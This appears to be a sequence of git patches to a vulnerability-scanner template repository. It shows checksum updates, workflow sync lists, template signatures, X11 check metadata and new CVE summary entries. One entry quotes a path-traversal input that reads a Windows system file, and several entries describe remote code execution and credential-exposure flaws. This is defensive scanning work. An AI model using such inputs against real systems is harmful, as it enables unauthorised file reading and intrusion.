http/cves/2024/CVE-2024-24565.yaml:3ce11e2d0ce96ee70c97b3442e730fdcc23b2bb6 +http/cves/2024/CVE-2024-24763.yaml:ea375daef2a1ce97faffb38d4cdee840e3fd3870 http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -8951,7 +8952,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2f38a0a62a87faea798a1bf7d93ff3fe454b1bcd +templates-checksum.txt:a32d41fc8be7f1c1fb116d782da63bca2e3e552c vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From d56fcf18ae92c3171b60b10037b1cde42dd68e29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:08:43 +0000 Subject: [PATCH 1820/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b6ad0100c9..293bf0a5d7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' + - 'http/cves/2024/CVE-2024-24763.yaml' - 'http/cves/2024/CVE-2024-34061.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' From 8bf5b35eb94f68d88077fe078f1dfe1dfe2c8e1f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Aug 2024 15:41:36 +0530 Subject: [PATCH 1821/1841] Update x11-unauth-access.yaml --- javascript/misconfiguration/x11/x11-unauth-access.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml index 2305b2f82c..b22f12fe53 100644 --- a/javascript/misconfiguration/x11/x11-unauth-access.yaml +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -1,7 +1,7 @@ id: x11-unauth-access info: - name: x11 - Unauthenticated + name: x11 - Unauthenticated Access author: pussycat0x severity: high description: | @@ -10,6 +10,10 @@ info: - https://nmap.org/nsedoc/scripts/x11-access.html - https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11 - https://www.hackingarticles.in/penetration-testing-on-x11-server/ + metadata: + shodan-query: "Open X Server:" + verified: true + max-request: 1 tags: x11,network,js,remote,unauth javascript: From f7971168d49d6bf688773ee6c15991989d7ce426 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:14:33 +0000 Subject: [PATCH 1822/1841] Auto Generated New Template Addition List [Thu Aug 1 10:14:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96e12e24fb..bd1edb6c27 100644 --- a/.new-additions +++ b/.new-additions @@ -20,3 +20,4 @@ http/osint/user-enumeration/substack.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +javascript/misconfiguration/x11/x11-unauth-access.yaml From f9180a83cc8de48dbd75dc5ed9ecf05bb4910157 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:14:42 +0000 Subject: [PATCH 1823/1841] Auto Generated Templates Checksum [Thu Aug 1 10:14:42 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index be411e29a9..d132762e06 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3487,7 +3487,7 @@ http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34061.yaml:da7614ca17ae070623437e3d94a2d4f97faa9efb +http/cves/2024/CVE-2024-34061.yaml:477bd7796719149a33356902f38fd7c4c1bc856f http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb @@ -8769,6 +8769,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 +javascript/misconfiguration/x11/x11-unauth-access.yaml:d1b21a89308ab060b98e68f915d02ab1b1a17de0 javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 @@ -8952,7 +8953,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a32d41fc8be7f1c1fb116d782da63bca2e3e552c +templates-checksum.txt:bab688b9113d21c436462a88055b93aae6ef6616 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 2a30c4f77831672a17a6c5ea83a9712cfdc1a1bd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:16:00 +0000 Subject: [PATCH 1824/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 293bf0a5d7..a1cada6964 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' + - 'javascript/misconfiguration/x11/x11-unauth-access.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 6a14558d5731d61d8d23ba23ac6e02075c75d15b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:16:27 +0000 Subject: [PATCH 1825/1841] Auto Template Signing [Thu Aug 1 10:16:27 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24763.yaml | 1 + http/misconfiguration/changedetection-unauth.yaml | 1 + javascript/misconfiguration/x11/x11-unauth-access.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-24763.yaml b/http/cves/2024/CVE-2024-24763.yaml index 7b906aabe4..4be6a2a58b 100644 --- a/http/cves/2024/CVE-2024-24763.yaml +++ b/http/cves/2024/CVE-2024-24763.yaml @@ -44,3 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4a0a00473045022100836a3b8a6b0652ccba5de5d740f9ebe69c24c2ec61e316b7ff34a75a6f4b7f8e02205b9d09c0f06a3828e9e8605e0841ab78f7648a7d82361b5a506ab3b1d88cd9df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/changedetection-unauth.yaml b/http/misconfiguration/changedetection-unauth.yaml index 989db4b97d..2968091e39 100644 --- a/http/misconfiguration/changedetection-unauth.yaml +++ b/http/misconfiguration/changedetection-unauth.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f4b0ac9c92eab0ea4d6fe36f3ec453a9b691a2148aafe9f281e9f6efaa1321b7022100c1e4e18be5f9c2ee3252c843294e680b6f1db68a590357408673dc56d9115085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml index b22f12fe53..dd1f56a6b3 100644 --- a/javascript/misconfiguration/x11/x11-unauth-access.yaml +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100d0d2240ba8d245ea409c87b839a686114e23eaab406679eee71c7dca123cd952022002799f834e0987770604d7578bcae71e697349711f61abff35b52952130cc259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 15b4bc0ae8adcf008fa9f5201bb1f12584ea81db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:38:19 +0000 Subject: [PATCH 1826/1841] Auto Generated cves.json [Thu Aug 1 10:38:19 UTC 2024] :robot: --- cves.json | 5 +++++ cves.json-checksum.txt | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e212a59394..f0e8c3cc10 100644 --- a/cves.json +++ b/cves.json @@ -2276,6 +2276,7 @@ {"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} +{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} @@ -2338,6 +2339,7 @@ {"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"} +{"ID":"CVE-2023-5222","Info":{"Name":"Viessmann Vitogate 300 - Hardcoded Password","Severity":"critical","Description":"A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5222.yaml"} {"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} @@ -2416,6 +2418,7 @@ {"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} {"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"} +{"ID":"CVE-2024-24763","Info":{"Name":"JumpServer \u003c 3.10.0 - Open Redirect","Severity":"medium","Description":"JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-24763.yaml"} {"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} @@ -2467,6 +2470,7 @@ {"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34061","Info":{"Name":"Changedetection.io \u003c=v0.45.21 - Cross-Site Scripting","Severity":"medium","Description":"Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-34061.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} {"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"} {"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"} @@ -2521,6 +2525,7 @@ {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"} {"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"} +{"ID":"CVE-2024-7120","Info":{"Name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","Severity":"medium","Description":"A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-7120.yaml"} {"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 699f66a1ce..dbd5588e86 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b69b59d70bacb648d224873b1b83419e +734828cf4c7ab354d5a5ccb1fed89917 From 440039dea34ffe9083f8ffa3c46780c46b0694ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 12:09:14 +0000 Subject: [PATCH 1827/1841] Auto Generated Templates Checksum [Thu Aug 1 12:09:14 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d132762e06..694371a8e4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,8 +224,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0f4eb7cbebfc4ff9da2bf1c30de44f37646a82f1 -cves.json-checksum.txt:78d171988a3d739a36543b840766a6feef335ab3 +cves.json:de9d83300996c6f0e401b62eb6db938bfc888be9 +cves.json-checksum.txt:9d55eb8264310fd9a1f4bf219cb0a61263b29f06 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3415,7 +3415,7 @@ http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 -http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 +http/cves/2024/CVE-2024-20767.yaml:3663dac621362623cf14b14e7850e6578eaea382 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b http/cves/2024/CVE-2024-21650.yaml:4f0a59b8d224262e95327dd4ed30d02741831108 @@ -3435,7 +3435,7 @@ http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c http/cves/2024/CVE-2024-24565.yaml:3ce11e2d0ce96ee70c97b3442e730fdcc23b2bb6 -http/cves/2024/CVE-2024-24763.yaml:ea375daef2a1ce97faffb38d4cdee840e3fd3870 +http/cves/2024/CVE-2024-24763.yaml:d55d6a15e871d845e6df1d99873d60d90a1ec949 http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -5563,7 +5563,7 @@ http/misconfiguration/browserless-debugger.yaml:c0e3296fa2d52ff89e0346546043721a http/misconfiguration/cadvisor-exposure.yaml:d236dc86e5e131b98b7c5c5f24d85e219448a249 http/misconfiguration/casdoor-users-password.yaml:bec0721cb2860bc3be2725338624cbeaadb20e1d http/misconfiguration/cgi-test-page.yaml:ce97987c25f63e9ef113fc09ddc2daf5a98c666c -http/misconfiguration/changedetection-unauth.yaml:071cf4423da1b833d7dbc7d4669943e388272534 +http/misconfiguration/changedetection-unauth.yaml:490a17a5c4d6f94ef96c349d248628b97c2c1531 http/misconfiguration/chatgpt-web-unauth.yaml:723a53934bc70af11866cc57d2cc46c3cf5ae119 http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342b593c8404 http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3 @@ -8769,7 +8769,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e 